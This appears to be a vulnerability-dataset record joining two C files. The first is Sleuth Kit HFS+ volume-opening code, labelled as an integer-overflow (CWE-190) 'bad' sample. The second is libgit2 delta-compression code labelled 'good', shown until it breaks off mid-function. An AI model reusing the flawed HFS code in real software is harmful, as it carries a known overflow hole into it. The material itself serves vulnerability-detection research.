if (tsk_fs_guessu16(fs, hfs->fs->signature, HFS_VH_SIG_HFSPLUS) &&
tsk_fs_guessu16(fs, hfs->fs->signature, HFS_VH_SIG_HFSX) &&
tsk_fs_guessu16(fs, hfs->fs->signature, HFS_VH_SIG_HFS)) {
fs->tag = 0;
free(hfs->fs);
tsk_fs_free((TSK_FS_INFO *)hfs);
tsk_error_set_errno(TSK_ERR_FS_MAGIC);
tsk_error_set_errstr("not an HFS+ file system (magic)");
return NULL;
}
/*
* Handle an HFS-wrapped HFS+ image, which is a HFS volume that contains
* the HFS+ volume inside of it.
*/
if (tsk_getu16(fs->endian, hfs->fs->signature) == HFS_VH_SIG_HFS) {
hfs_mdb *wrapper_sb = (hfs_mdb *) hfs->fs;
// Verify that we are setting a wrapper and not a normal HFS volume
if ((tsk_getu16(fs->endian,
wrapper_sb->drEmbedSigWord) == HFS_VH_SIG_HFSPLUS)
|| (tsk_getu16(fs->endian,
wrapper_sb->drEmbedSigWord) == HFS_VH_SIG_HFSX)) {
TSK_FS_INFO *fs_info2;
// offset in sectors to start of first HFS block
uint16_t drAlBlSt =
tsk_getu16(fs->endian, wrapper_sb->drAlBlSt);
// size of each HFS block
uint32_t drAlBlkSiz =
tsk_getu32(fs->endian, wrapper_sb->drAlBlkSiz);
// start of embedded FS
uint16_t startBlock = tsk_getu16(fs->endian,
wrapper_sb->drEmbedExtent_startBlock);
// calculate the offset; 512 here is intentional.
// TN1150 says "The drAlBlSt field contains the offset, in
// 512-byte blocks, of the wrapper's allocation block 0 relative
// to the start of the volume"
TSK_OFF_T hfsplus_offset =
(drAlBlSt * (TSK_OFF_T) 512) +
(drAlBlkSiz * (TSK_OFF_T) startBlock);
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_open: HFS+/HFSX within HFS wrapper at byte offset %"
PRIuOFF "\n", hfsplus_offset);
fs->tag = 0;
free(hfs->fs);
tsk_fs_free((TSK_FS_INFO *)hfs);
/* just re-open with the new offset, then record the offset */
if (hfsplus_offset == 0) {
tsk_error_set_errno(TSK_ERR_FS_CORRUPT);
tsk_error_set_errstr("HFS+ offset is zero");
return NULL;
}
fs_info2 =
hfs_open(img_info, offset + hfsplus_offset, ftype, test);
if (fs_info2)
((HFS_INFO *) fs_info2)->hfs_wrapper_offset =
hfsplus_offset;
return fs_info2;
}
else {
fs->tag = 0;
free(hfs->fs);
tsk_fs_free((TSK_FS_INFO *)hfs);
tsk_error_set_errno(TSK_ERR_FS_MAGIC);
tsk_error_set_errstr
("HFS file systems (other than wrappers HFS+/HFSX file systems) are not supported");
return NULL;
}
}
fs->block_count = tsk_getu32(fs->endian, hfs->fs->blk_cnt);
fs->first_block = 0;
fs->last_block = fs->last_block_act = fs->block_count - 1;
/* this isn't really accurate; fs->block_size reports only the size
of the allocation block; the size of the device block has to be
found from the device (allocation block size should always be
larger than device block size and an even multiple of the device
block size) */
fs->dev_bsize = fs->block_size =
tsk_getu32(fs->endian, hfs->fs->blk_sz);
// determine the last block we have in this image
if (fs->block_size <= 1) {
fs->tag = 0;
free(hfs->fs);
tsk_fs_free((TSK_FS_INFO *)hfs);
tsk_error_set_errno(TSK_ERR_FS_CORRUPT);
tsk_error_set_errstr("HFS+ allocation block size too small");
return NULL;
}
if ((TSK_DADDR_T) ((img_info->size - offset) / fs->block_size) <
fs->block_count)
fs->last_block_act =
(img_info->size - offset) / fs->block_size - 1;
// Initialize the lock
tsk_init_lock(&(hfs->metadata_dir_cache_lock));
/*
* Set function pointers
*/
fs->inode_walk = hfs_inode_walk;
fs->block_walk = hfs_block_walk;
fs->block_getflags = hfs_block_getflags;
fs->load_attrs = hfs_load_attrs;
fs->get_default_attr_type = hfs_get_default_attr_type;
fs->file_add_meta = hfs_inode_lookup;
fs->dir_open_meta = hfs_dir_open_meta;
fs->fsstat = hfs_fsstat;
fs->fscheck = hfs_fscheck;
fs->istat = hfs_istat;
fs->close = hfs_close;
// lazy loading of block map
hfs->blockmap_file = NULL;
hfs->blockmap_attr = NULL;
hfs->blockmap_cache_start = -1;
hfs->blockmap_cache_len = 0;
fs->first_inum = HFS_ROOT_INUM;
fs->root_inum = HFS_ROOT_INUM;
fs->last_inum = HFS_FIRST_USER_CNID - 1; // we will later increase this
fs->inum_count = fs->last_inum - fs->first_inum + 1;
/* We will load the extents file data when we need it */
hfs->extents_file = NULL;
hfs->extents_attr = NULL;
if (tsk_getu32(fs->endian,
hfs->fs->start_file.extents[0].blk_cnt) == 0) {
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_open: Optional Startup File is not present.\n");
hfs->has_startup_file = FALSE;
}
else {
if (tsk_verbose)
tsk_fprintf(stderr, "hfs_open: Startup File is present.\n");
hfs->has_startup_file = TRUE;
}
if (tsk_getu32(fs->endian, hfs->fs->ext_file.extents[0].blk_cnt) == 0) {
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_open: Optional Extents File (and Badblocks File) is not present.\n");
hfs->has_extents_file = FALSE;
}
else {
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_open: Extents File (and BadBlocks File) is present.\n");
hfs->has_extents_file = TRUE;
}
if (tsk_getu32(fs->endian, hfs->fs->attr_file.extents[0].blk_cnt) == 0) {
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_open: Optional Attributes File is not present.\n");
hfs->has_attributes_file = FALSE;
}
else {
if (tsk_verbose)
tsk_fprintf(stderr, "hfs_open: Attributes File is present.\n");
hfs->has_attributes_file = TRUE;
}
/* Load the catalog file though */
if ((hfs->catalog_file =
tsk_fs_file_open_meta(fs, NULL,
HFS_CATALOG_FILE_ID)) == NULL) {
hfs_close(fs);
return NULL;
}
/* cache the data attribute */
hfs->catalog_attr =
tsk_fs_attrlist_get(hfs->catalog_file->meta->attr,
TSK_FS_ATTR_TYPE_DEFAULT);
if (!hfs->catalog_attr) {
hfs_close(fs);
tsk_error_errstr2_concat
(" - Data Attribute not found in Catalog File");
return NULL;
}
// cache the catalog file header
cnt = tsk_fs_attr_read(hfs->catalog_attr, 14,
(char *) &(hfs->catalog_header),
sizeof(hfs_btree_header_record), 0);
if (cnt != sizeof(hfs_btree_header_record)) {
if (cnt >= 0) {
tsk_error_reset();
tsk_error_set_errno(TSK_ERR_FS_READ);
}
hfs_close(fs);
tsk_error_set_errstr2("hfs_open: Error reading catalog header");
return NULL;
}
if (tsk_getu16(fs->endian, hfs->fs->version) == HFS_VH_VER_HFSPLUS)
hfs->is_case_sensitive = 0;
else if (tsk_getu16(fs->endian, hfs->fs->version) == HFS_VH_VER_HFSX) {
if (hfs->catalog_header.compType == HFS_BT_HEAD_COMP_SENS)
hfs->is_case_sensitive = 1;
else if (hfs->catalog_header.compType == HFS_BT_HEAD_COMP_INSENS)
hfs->is_case_sensitive = 0;
else {
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_open: invalid value (0x%02" PRIx8
") for key compare type; using case-insensitive\n",
hfs->catalog_header.compType);
hfs->is_case_sensitive = 0;
}
}
else {
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_open: unknown HFS+/HFSX version (%" PRIu16 "\n",
tsk_getu16(fs->endian, hfs->fs->version));
hfs->is_case_sensitive = 0;
}
// update the numbers.
fs->last_inum = hfs_find_highest_inum(hfs);
fs->inum_count = fs->last_inum + 1;
snprintf((char *) fs->fs_id, 17, "%08" PRIx32 "%08" PRIx32,
tsk_getu32(fs->endian, hfs->fs->finder_info[HFS_VH_FI_ID1]),
tsk_getu32(fs->endian, hfs->fs->finder_info[HFS_VH_FI_ID2]));
fs->fs_id_used = 16;
/* journal */
fs->jblk_walk = hfs_jblk_walk;
fs->jentry_walk = hfs_jentry_walk;
fs->jopen = hfs_jopen;
fs->name_cmp = hfs_name_cmp;
fs->journ_inum = 0;
/* Creation Times */
// First, the root
file = tsk_fs_file_open_meta(fs, NULL, 2);
if (file != NULL) {
hfs->root_crtime = file->meta->crtime;
hfs->has_root_crtime = TRUE;
tsk_fs_file_close(file);
}
else {
hfs->has_root_crtime = FALSE;
}
file = NULL;
// disable hard link traversal while finding the hard
// link directories themselves (to prevent problems if
// there are hard links in the root directory)
hfs->meta_inum = 0;
hfs->meta_dir_inum = 0;
// Now the (file) metadata directory
// The metadata directory is a sub-directory of the root. Its name begins with four nulls, followed
// by "HFS+ Private Data". The file system parsing code replaces nulls in filenames with UTF8_NULL_REPLACE.
// In the released version of TSK, this replacement is the character '^'.
// NOTE: There is a standard Unicode replacement which is 0xfffd in UTF16 and 0xEF 0xBF 0xBD in UTF8.
// Systems that require the standard definition can redefine UTF8_NULL_REPLACE and UTF16_NULL_REPLACE
// in tsk_hfs.h
hfs->has_meta_crtime = FALSE;
result =
tsk_fs_path2inum(fs,
"/" UTF8_NULL_REPLACE UTF8_NULL_REPLACE UTF8_NULL_REPLACE
UTF8_NULL_REPLACE "HFS+ Private Data", &inum, NULL);
if (result == 0) {
TSK_FS_FILE *file_tmp = tsk_fs_file_open_meta(fs, NULL, inum);
if (file_tmp != NULL) {
hfs->meta_crtime = file_tmp->meta->crtime;
hfs->has_meta_crtime = TRUE;
hfs->meta_inum = inum;
tsk_fs_file_close(file_tmp);
}
}
// Now, the directory metadata directory
// The "directory" metadata directory, where hardlinked directories actually live, is a subdirectory
// of the root. The beginning of the name of this directory is ".HFS+ Private Directory Data" which
// is followed by a carriage return (ASCII 13).
hfs->has_meta_dir_crtime = FALSE;
result =
tsk_fs_path2inum(fs, "/.HFS+ Private Directory Data\r", &inum,
NULL);
if (result == 0) {
TSK_FS_FILE *file_tmp = tsk_fs_file_open_meta(fs, NULL, inum);
if (file_tmp != NULL) {
hfs->metadir_crtime = file_tmp->meta->crtime;
hfs->has_meta_dir_crtime = TRUE;
hfs->meta_dir_inum = inum;
tsk_fs_file_close(file_tmp);
}
}
if (hfs->has_root_crtime && hfs->has_meta_crtime
&& hfs->has_meta_dir_crtime) {
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_open: Creation times for key folders have been read and cached.\n");
}
if (!hfs->has_root_crtime) {
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_open: Warning: Could not open the root directory. "
"Hard link detection and some other functions will be impaired\n");
}
else if (tsk_verbose) {
tsk_fprintf(stderr,
"hfs_open: The root directory is accessible.\n");
}
if (tsk_verbose) {
if (hfs->has_meta_crtime)
tsk_fprintf(stderr,
"hfs_open: \"/^^^^HFS+ Private Data\" metadata folder is accessible.\n");
else
tsk_fprintf(stderr,
"hfs_open: Optional \"^^^^HFS+ Private Data\" metadata folder is not accessible, or does not exist.\n");
if (hfs->has_meta_dir_crtime)
tsk_fprintf(stderr,
"hfs_open: \"/HFS+ Private Directory Data^\" metadata folder is accessible.\n");
else
tsk_fprintf(stderr,
"hfs_open: Optional \"/HFS+ Private Directory Data^\" metadata folder is not accessible, or does not exist.\n");
}
// These caches will be set, if they are needed.
hfs->meta_dir = NULL;
hfs->dir_meta_dir = NULL;
return fs;
}
/*
* Error Handling
*/
/**
* Call this when an error is first detected. It sets the error code and it also
* sets the primary error string, describing the lowest level of error. (Actually,
* it appends to the error string.)
*
* If the error code is already set, then this appends to the primary error
* string an hex representation of the new error code, plus the new error message.
*
* @param errnum The desired error code
* @param errstr The format string for the error message
*/
void
error_detected(uint32_t errnum, char *errstr, ...)
{
va_list args;
va_start(args, errstr);
{
TSK_ERROR_INFO *errInfo = tsk_error_get_info();
char *loc_errstr = errInfo->errstr;
if (errInfo->t_errno == 0)
errInfo->t_errno = errnum;
else {
//This should not happen! We don't want to wipe out the existing error
//code, so we write the new code into the error string, in hex.
int sl = strlen(errstr);
snprintf(loc_errstr + sl, TSK_ERROR_STRING_MAX_LENGTH - sl,
" Next errnum: 0x%x ", errnum);
}
if (errstr != NULL) {
int sl = strlen(loc_errstr);
vsnprintf(loc_errstr + sl, TSK_ERROR_STRING_MAX_LENGTH - sl,
errstr, args);
}
}
va_end(args);
}
/**
* Call this when a called TSK function returns an error. Presumably, that
* function will have set the error code and the primary error string. This
* *appends* to the secondary error string. It should be called to describe
* the context of the call. If no error code has been set, then this sets a
* default code so that it is not zero.
*
* @param errstr The format string for the error message
*/
void
error_returned(char *errstr, ...)
{
va_list args;
va_start(args, errstr);
{
TSK_ERROR_INFO *errInfo = tsk_error_get_info();
char *loc_errstr2 = errInfo->errstr2;
if (errInfo->t_errno == 0)
errInfo->t_errno = TSK_ERR_AUX_GENERIC;
if (errstr != NULL) {
int sl = strlen(loc_errstr2);
vsnprintf(loc_errstr2 + sl, TSK_ERROR_STRING_MAX_LENGTH - sl,
errstr, args);
}
}
va_end(args);
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_711_0 |
crossvul-cpp_data_good_111_0 | /*
* Copyright (C) the libgit2 contributors. All rights reserved.
*
* This file is part of libgit2, distributed under the GNU GPL v2 with
* a Linking Exception. For full terms see the included COPYING file.
*/
#include "delta.h"
/* maximum hash entry list for the same hash bucket */
#define HASH_LIMIT 64
#define RABIN_SHIFT 23
#define RABIN_WINDOW 16
static const unsigned int T[256] = {
0x00000000, 0xab59b4d1, 0x56b369a2, 0xfdeadd73, 0x063f6795, 0xad66d344,
0x508c0e37, 0xfbd5bae6, 0x0c7ecf2a, 0xa7277bfb, 0x5acda688, 0xf1941259,
0x0a41a8bf, 0xa1181c6e, 0x5cf2c11d, 0xf7ab75cc, 0x18fd9e54, 0xb3a42a85,
0x4e4ef7f6, 0xe5174327, 0x1ec2f9c1, 0xb59b4d10, 0x48719063, 0xe32824b2,
0x1483517e, 0xbfdae5af, 0x423038dc, 0xe9698c0d, 0x12bc36eb, 0xb9e5823a,
0x440f5f49, 0xef56eb98, 0x31fb3ca8, 0x9aa28879, 0x6748550a, 0xcc11e1db,
0x37c45b3d, 0x9c9defec, 0x6177329f, 0xca2e864e, 0x3d85f382, 0x96dc4753,
0x6b369a20, 0xc06f2ef1, 0x3bba9417, 0x90e320c6, 0x6d09fdb5, 0xc6504964,
0x2906a2fc, 0x825f162d, 0x7fb5cb5e, 0xd4ec7f8f, 0x2f39c569, 0x846071b8,
0x798aaccb, 0xd2d3181a, 0x25786dd6, 0x8e21d907, 0x73cb0474, 0xd892b0a5,
0x23470a43, 0x881ebe92, 0x75f463e1, 0xdeadd730, 0x63f67950, 0xc8afcd81,
0x354510f2, 0x9e1ca423, 0x65c91ec5, 0xce90aa14, 0x337a7767, 0x9823c3b6,
0x6f88b67a, 0xc4d102ab, 0x393bdfd8, 0x92626b09, 0x69b7d1ef, 0xc2ee653e,
0x3f04b84d, 0x945d0c9c, 0x7b0be704, 0xd05253d5, 0x2db88ea6, 0x86e13a77,
0x7d348091, 0xd66d3440, 0x2b87e933, 0x80de5de2, 0x7775282e, 0xdc2c9cff,
0x21c6418c, 0x8a9ff55d, 0x714a4fbb, 0xda13fb6a, 0x27f92619, 0x8ca092c8,
0x520d45f8, 0xf954f129, 0x04be2c5a, 0xafe7988b, 0x5432226d, 0xff6b96bc,
0x02814bcf, 0xa9d8ff1e, 0x5e738ad2, 0xf52a3e03, 0x08c0e370, 0xa39957a1,
0x584ced47, 0xf3155996, 0x0eff84e5, 0xa5a63034, 0x4af0dbac, 0xe1a96f7d,
0x1c43b20e, 0xb71a06df, 0x4ccfbc39, 0xe79608e8, 0x1a7cd59b, 0xb125614a,
0x468e1486, 0xedd7a057, 0x103d7d24, 0xbb64c9f5, 0x40b17313, 0xebe8c7c2,
0x16021ab1, 0xbd5bae60, 0x6cb54671, 0xc7ecf2a0, 0x3a062fd3, 0x915f9b02,
0x6a8a21e4, 0xc1d39535, 0x3c394846, 0x9760fc97, 0x60cb895b, 0xcb923d8a,
0x3678e0f9, 0x9d215428, 0x66f4eece, 0xcdad5a1f, 0x3047876c, 0x9b1e33bd,
0x7448d825, 0xdf116cf4, 0x22fbb187, 0x89a20556, 0x7277bfb0, 0xd92e0b61,
0x24c4d612, 0x8f9d62c3, 0x7836170f, 0xd36fa3de, 0x2e857ead, 0x85dcca7c,
0x7e09709a, 0xd550c44b, 0x28ba1938, 0x83e3ade9, 0x5d4e7ad9, 0xf617ce08,
0x0bfd137b, 0xa0a4a7aa, 0x5b711d4c, 0xf028a99d, 0x0dc274ee, 0xa69bc03f,
0x5130b5f3, 0xfa690122, 0x0783dc51, 0xacda6880, 0x570fd266, 0xfc5666b7,
0x01bcbbc4, 0xaae50f15, 0x45b3e48d, 0xeeea505c, 0x13008d2f, 0xb85939fe,
0x438c8318, 0xe8d537c9, 0x153feaba, 0xbe665e6b, 0x49cd2ba7, 0xe2949f76,
0x1f7e4205, 0xb427f6d4, 0x4ff24c32, 0xe4abf8e3, 0x19412590, 0xb2189141,
0x0f433f21, 0xa41a8bf0, 0x59f05683, 0xf2a9e252, 0x097c58b4, 0xa225ec65,
0x5fcf3116, 0xf49685c7, 0x033df00b, 0xa86444da, 0x558e99a9, 0xfed72d78,
0x0502979e, 0xae5b234f, 0x53b1fe3c, 0xf8e84aed, 0x17bea175, 0xbce715a4,
0x410dc8d7, 0xea547c06, 0x1181c6e0, 0xbad87231, 0x4732af42, 0xec6b1b93,
0x1bc06e5f, 0xb099da8e, 0x4d7307fd, 0xe62ab32c, 0x1dff09ca, 0xb6a6bd1b,
0x4b4c6068, 0xe015d4b9, 0x3eb80389, 0x95e1b758, 0x680b6a2b, 0xc352defa,
0x3887641c, 0x93ded0cd, 0x6e340dbe, 0xc56db96f, 0x32c6cca3, 0x999f7872,
0x6475a501, 0xcf2c11d0, 0x34f9ab36, 0x9fa01fe7, 0x624ac294, 0xc9137645,
0x26459ddd, 0x8d1c290c, 0x70f6f47f, 0xdbaf40ae, 0x207afa48, 0x8b234e99,
0x76c993ea, 0xdd90273b, 0x2a3b52f7, 0x8162e626, 0x7c883b55, 0xd7d18f84,
0x2c043562, 0x875d81b3, 0x7ab75cc0, 0xd1eee811
};
static const unsigned int U[256] = {
0x00000000, 0x7eb5200d, 0x5633f4cb, 0x2886d4c6, 0x073e5d47, 0x798b7d4a,
0x510da98c, 0x2fb88981, 0x0e7cba8e, 0x70c99a83, 0x584f4e45, 0x26fa6e48,
0x0942e7c9, 0x77f7c7c4, 0x5f711302, 0x21c4330f, 0x1cf9751c, 0x624c5511,
0x4aca81d7, 0x347fa1da, 0x1bc7285b, 0x65720856, 0x4df4dc90, 0x3341fc9d,
0x1285cf92, 0x6c30ef9f, 0x44b63b59, 0x3a031b54, 0x15bb92d5, 0x6b0eb2d8,
0x4388661e, 0x3d3d4613, 0x39f2ea38, 0x4747ca35, 0x6fc11ef3, 0x11743efe,
0x3eccb77f, 0x40799772, 0x68ff43b4, 0x164a63b9, 0x378e50b6, 0x493b70bb,
0x61bda47d, 0x1f088470, 0x30b00df1, 0x4e052dfc, 0x6683f93a, 0x1836d937,
0x250b9f24, 0x5bbebf29, 0x73386bef, 0x0d8d4be2, 0x2235c263, 0x5c80e26e,
0x740636a8, 0x0ab316a5, 0x2b7725aa, 0x55c205a7, 0x7d44d161, 0x03f1f16c,
0x2c4978ed, 0x52fc58e0, 0x7a7a8c26, 0x04cfac2b, 0x73e5d470, 0x0d50f47d,
0x25d620bb, 0x5b6300b6, 0x74db8937, 0x0a6ea93a, 0x22e87dfc, 0x5c5d5df1,
0x7d996efe, 0x032c4ef3, 0x2baa9a35, 0x551fba38, 0x7aa733b9, 0x041213b4,
0x2c94c772, 0x5221e77f, 0x6f1ca16c, 0x11a98161, 0x392f55a7, 0x479a75aa,
0x6822fc2b, 0x1697dc26, 0x3e1108e0, 0x40a428ed, 0x61601be2, 0x1fd53bef,
0x3753ef29, 0x49e6cf24, 0x665e46a5, 0x18eb66a8, 0x306db26e, 0x4ed89263,
0x4a173e48, 0x34a21e45, 0x1c24ca83, 0x6291ea8e, 0x4d29630f, 0x339c4302,
0x1b1a97c4, 0x65afb7c9, 0x446b84c6, 0x3adea4cb, 0x1258700d, 0x6ced5000,
0x4355d981, 0x3de0f98c, 0x15662d4a, 0x6bd30d47, 0x56ee4b54, 0x285b6b59,
0x00ddbf9f, 0x7e689f92, 0x51d01613, 0x2f65361e, 0x07e3e2d8, 0x7956c2d5,
0x5892f1da, 0x2627d1d7, 0x0ea10511, 0x7014251c, 0x5facac9d, 0x21198c90,
0x099f5856, 0x772a785b, 0x4c921c31, 0x32273c3c, 0x1aa1e8fa, 0x6414c8f7,
0x4bac4176, 0x3519617b, 0x1d9fb5bd, 0x632a95b0, 0x42eea6bf, 0x3c5b86b2,
0x14dd5274, 0x6a687279, 0x45d0fbf8, 0x3b65dbf5, 0x13e30f33, 0x6d562f3e,
0x506b692d, 0x2ede4920, 0x06589de6, 0x78edbdeb, 0x5755346a, 0x29e01467,
0x0166c0a1, 0x7fd3e0ac, 0x5e17d3a3, 0x20a2f3ae, 0x08242768, 0x76910765,
0x59298ee4, 0x279caee9, 0x0f1a7a2f, 0x71af5a22, 0x7560f609, 0x0bd5d604,
0x235302c2, 0x5de622cf, 0x725eab4e, 0x0ceb8b43, 0x246d5f85, 0x5ad87f88,
0x7b1c4c87, 0x05a96c8a, 0x2d2fb84c, 0x539a9841, 0x7c2211c0, 0x029731cd,
0x2a11e50b, 0x54a4c506, 0x69998315, 0x172ca318, 0x3faa77de, 0x411f57d3,
0x6ea7de52, 0x1012fe5f, 0x38942a99, 0x46210a94, 0x67e5399b, 0x19501996,
0x31d6cd50, 0x4f63ed5d, 0x60db64dc, 0x1e6e44d1, 0x36e89017, 0x485db01a,
0x3f77c841, 0x41c2e84c, 0x69443c8a, 0x17f11c87, 0x38499506, 0x46fcb50b,
0x6e7a61cd, 0x10cf41c0, 0x310b72cf, 0x4fbe52c2, 0x67388604, 0x198da609,
0x36352f88, 0x48800f85, 0x6006db43, 0x1eb3fb4e, 0x238ebd5d, 0x5d3b9d50,
0x75bd4996, 0x0b08699b, 0x24b0e01a, 0x5a05c017, 0x728314d1, 0x0c3634dc,
0x2df207d3, 0x534727de, 0x7bc1f318, 0x0574d315, 0x2acc5a94, 0x54797a99,
0x7cffae5f, 0x024a8e52, 0x06852279, 0x78300274, 0x50b6d6b2, 0x2e03f6bf,
0x01bb7f3e, 0x7f0e5f33, 0x57888bf5, 0x293dabf8, 0x08f998f7, 0x764cb8fa,
0x5eca6c3c, 0x207f4c31, 0x0fc7c5b0, 0x7172e5bd, 0x59f4317b, 0x27411176,
0x1a7c5765, 0x64c97768, 0x4c4fa3ae, 0x32fa83a3, 0x1d420a22, 0x63f72a2f,
0x4b71fee9, 0x35c4dee4, 0x1400edeb, 0x6ab5cde6, 0x42331920, 0x3c86392d,
0x133eb0ac, 0x6d8b90a1, 0x450d4467, 0x3bb8646a
};
struct index_entry {
const unsigned char *ptr;
unsigned int val;
struct index_entry *next;
};
struct git_delta_index {
unsigned long memsize;
const void *src_buf;
size_t src_size;
unsigned int hash_mask;
struct index_entry *hash[GIT_FLEX_ARRAY];
};
static int lookup_index_alloc(
void **out, unsigned long *out_len, size_t entries, size_t hash_count)
{
size_t entries_len, hash_len, index_len;
GITERR_CHECK_ALLOC_MULTIPLY(&entries_len, entries, sizeof(struct index_entry));
GITERR_CHECK_ALLOC_MULTIPLY(&hash_len, hash_count, sizeof(struct index_entry *));
GITERR_CHECK_ALLOC_ADD(&index_len, sizeof(struct git_delta_index), entries_len);
GITERR_CHECK_ALLOC_ADD(&index_len, index_len, hash_len);
if (!git__is_ulong(index_len)) {
giterr_set(GITERR_NOMEMORY, "overly large delta");
return -1;
}
*out = git__malloc(index_len);
GITERR_CHECK_ALLOC(*out);
*out_len = index_len;
return 0;
}
int git_delta_index_init(
git_delta_index **out, const void *buf, size_t bufsize)
{
unsigned int i, hsize, hmask, entries, prev_val, *hash_count;
const unsigned char *data, *buffer = buf;
struct git_delta_index *index;
struct index_entry *entry, **hash;
void *mem;
unsigned long memsize;
*out = NULL;
if (!buf || !bufsize)
return 0;
/* Determine index hash size. Note that indexing skips the
first byte to allow for optimizing the rabin polynomial
initialization in create_delta(). */
entries = (unsigned int)(bufsize - 1) / RABIN_WINDOW;
if (bufsize >= 0xffffffffUL) {
/*
* Current delta format can't encode offsets into
* reference buffer with more than 32 bits.
*/
entries = 0xfffffffeU / RABIN_WINDOW;
}
hsize = entries / 4;
for (i = 4; i < 31 && (1u << i) < hsize; i++);
hsize = 1 << i;
hmask = hsize - 1;
if (lookup_index_alloc(&mem, &memsize, entries, hsize) < 0)
return -1;
index = mem;
mem = index->hash;
hash = mem;
mem = hash + hsize;
entry = mem;
index->memsize = memsize;
index->src_buf = buf;
index->src_size = bufsize;
index->hash_mask = hmask;
memset(hash, 0, hsize * sizeof(*hash));
/* allocate an array to count hash entries */
hash_count = git__calloc(hsize, sizeof(*hash_count));
if (!hash_count) {
git__free(index);
return -1;
}
/* then populate the index */
prev_val = ~0;
for (data = buffer + entries * RABIN_WINDOW - RABIN_WINDOW;
data >= buffer;
data -= RABIN_WINDOW) {
unsigned int val = 0;
for (i = 1; i <= RABIN_WINDOW; i++)
val = ((val << 8) | data[i]) ^ T[val >> RABIN_SHIFT];
if (val == prev_val) {
/* keep the lowest of consecutive identical blocks */
entry[-1].ptr = data + RABIN_WINDOW;
} else {
prev_val = val;
i = val & hmask;
entry->ptr = data + RABIN_WINDOW;
entry->val = val;
entry->next = hash[i];
hash[i] = entry++;
hash_count[i]++;
}
}
/*
* Determine a limit on the number of entries in the same hash
* bucket. This guard us against patological data sets causing
* really bad hash distribution with most entries in the same hash
* bucket that would bring us to O(m*n) computing costs (m and n
* corresponding to reference and target buffer sizes).
*
* Make sure none of the hash buckets has more entries than
* we're willing to test. Otherwise we cull the entry list
* uniformly to still preserve a good repartition across
* the reference buffer.
*/
for (i = 0; i < hsize; i++) {
if (hash_count[i] < HASH_LIMIT)
continue;
entry = hash[i];
do {
struct index_entry *keep = entry;
int skip = hash_count[i] / HASH_LIMIT / 2;
do {
entry = entry->next;
} while(--skip && entry);
keep->next = entry;
} while (entry);
}
git__free(hash_count);
*out = index;
return 0;
}
void git_delta_index_free(git_delta_index *index)
{
git__free(index);
}
size_t git_delta_index_size(git_delta_index *index)
{
assert(index);
return index->memsize;
}
/*
* The maximum size for any opcode sequence, including the initial header
* plus rabin window plus biggest copy.
*/
#define MAX_OP_SIZE (5 + 5 + 1 + RABIN_WINDOW + 7)
int git_delta_create_from_index(
void **out,
size_t *out_len,
const struct git_delta_index *index,
const void *trg_buf,
size_t trg_size,
size_t max_size)
{
unsigned int i, bufpos, bufsize, moff, msize, val;
int inscnt;
const unsigned char *ref_data, *ref_top, *data, *top;
unsigned char *buf;
*out = NULL;
*out_len = 0;
if (!trg_buf || !trg_size)
return 0;
bufpos = 0;
bufsize = 8192;
if (max_size && bufsize >= max_size)
bufsize = (unsigned int)(max_size + MAX_OP_SIZE + 1);
buf = git__malloc(bufsize);
GITERR_CHECK_ALLOC(buf);
/* store reference buffer size */
i = index->src_size;
while (i >= 0x80) {
buf[bufpos++] = i | 0x80;
i >>= 7;
}
buf[bufpos++] = i;
/* store target buffer size */
i = trg_size;
while (i >= 0x80) {
buf[bufpos++] = i | 0x80;
i >>= 7;
}
buf[bufpos++] = i;
ref_data = index->src_buf;
ref_top = ref_data + index->src_size;
data = trg_buf;
top = (const unsigned char *) trg_buf + trg_size;
bufpos++;
val = 0;
for (i = 0; i < RABIN_WINDOW && data < top; i++, data++) {
buf[bufpos++] = *data;
val = ((val << 8) | *data) ^ T[val >> RABIN_SHIFT];
}
inscnt = i;
moff = 0;
msize = 0;
while (data < top) {
if (msize < 4096) {
struct index_entry *entry;
val ^= U[data[-RABIN_WINDOW]];
val = ((val << 8) | *data) ^ T[val >> RABIN_SHIFT];
i = val & index->hash_mask;
for (entry = index->hash[i]; entry; entry = entry->next) {
const unsigned char *ref = entry->ptr;
const unsigned char *src = data;
unsigned int ref_size = (unsigned int)(ref_top - ref);
if (entry->val != val)
continue;
if (ref_size > (unsigned int)(top - src))
ref_size = (unsigned int)(top - src);
if (ref_size <= msize)
break;
while (ref_size-- && *src++ == *ref)
ref++;
if (msize < (unsigned int)(ref - entry->ptr)) {
/* this is our best match so far */
msize = (unsigned int)(ref - entry->ptr);
moff = (unsigned int)(entry->ptr - ref_data);
if (msize >= 4096) /* good enough */
break;
}
}
}
if (msize < 4) {
if (!inscnt)
bufpos++;
buf[bufpos++] = *data++;
inscnt++;
if (inscnt == 0x7f) {
buf[bufpos - inscnt - 1] = inscnt;
inscnt = 0;
}
msize = 0;
} else {
unsigned int left;
unsigned char *op;
if (inscnt) {
while (moff && ref_data[moff-1] == data[-1]) {
/* we can match one byte back */
msize++;
moff--;
data--;
bufpos--;
if (--inscnt)
continue;
bufpos--; /* remove count slot */
inscnt--; /* make it -1 */
break;
}
buf[bufpos - inscnt - 1] = inscnt;
inscnt = 0;
}
/* A copy op is currently limited to 64KB (pack v2) */
left = (msize < 0x10000) ? 0 : (msize - 0x10000);
msize -= left;
op = buf + bufpos++;
i = 0x80;
if (moff & 0x000000ff)
buf[bufpos++] = moff >> 0, i |= 0x01;
if (moff & 0x0000ff00)
buf[bufpos++] = moff >> 8, i |= 0x02;
if (moff & 0x00ff0000)
buf[bufpos++] = moff >> 16, i |= 0x04;
if (moff & 0xff000000)
buf[bufpos++] = moff >> 24, i |= 0x08;
if (msize & 0x00ff)
buf[bufpos++] = msize >> 0, i |= 0x10;
if (msize & 0xff00)
buf[bufpos++] = msize >> 8, i |= 0x20;
*op = i;
data += msize;
moff += msize;
msize = left;
if (msize < 4096) {
int j;
val = 0;
for (j = -RABIN_WINDOW; j < 0; j++)
val = ((val << 8) | data[j])
^ T[val >> RABIN_SHIFT];
}
}
if (bufpos >= bufsize - MAX_OP_SIZE) {
void *tmp = buf;
bufsize = bufsize * 3 / 2;
if (max_size && bufsize >= max_size)
bufsize = max_size + MAX_OP_SIZE + 1;
